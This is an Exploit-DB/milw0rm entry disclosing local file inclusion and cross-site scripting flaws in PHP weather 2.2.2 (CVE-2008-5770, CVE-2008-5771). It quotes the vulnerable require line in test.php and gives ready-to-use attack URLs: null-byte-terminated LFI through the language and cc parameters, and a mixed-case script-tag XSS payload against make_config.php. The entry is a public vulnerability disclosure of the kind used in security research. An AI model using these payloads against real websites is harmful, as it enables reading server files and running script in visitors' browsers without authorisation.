PHP weather 2.2.2 - Local File Inclusion / Cross-Site Scripting

Author: ahmadbady
type: webapps
platform: php
port: 
date_added: 2008-12-13 
date_updated: 2017-01-06 
verified: 1 
codes: OSVDB-51068;CVE-2008-5771;OSVDB-51067;CVE-2008-5770 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comphpweather-2.2.2.zip

****(Lfi/xss)****

script: phpweather-2.2.2

***************************************************************************
download from:http://downloads.sourceforge.net/phpweather/phpweather-2.2.2.zip?modtime=1087430400&big_mirror=0

***************************************************************************
vul:
/test.php

line 48:
 require(PHPWEATHER_BASE_DIR . "/output/pw_text_$language.php");

***************************************************
xpl:
www.site.com/path/test.php?metar=()&language=[Lfi]%00
.....................................................
www.site.com/path/index.php?cc=[Lfi]
....................................................
xss:
www.site.com/path/config/make_config.php/>"><ScRiPt>alert(0)</ScRiPt>
..................................................

Author: ahmadbady from:iran

***************************************************

# milw0rm.com [2008-12-14]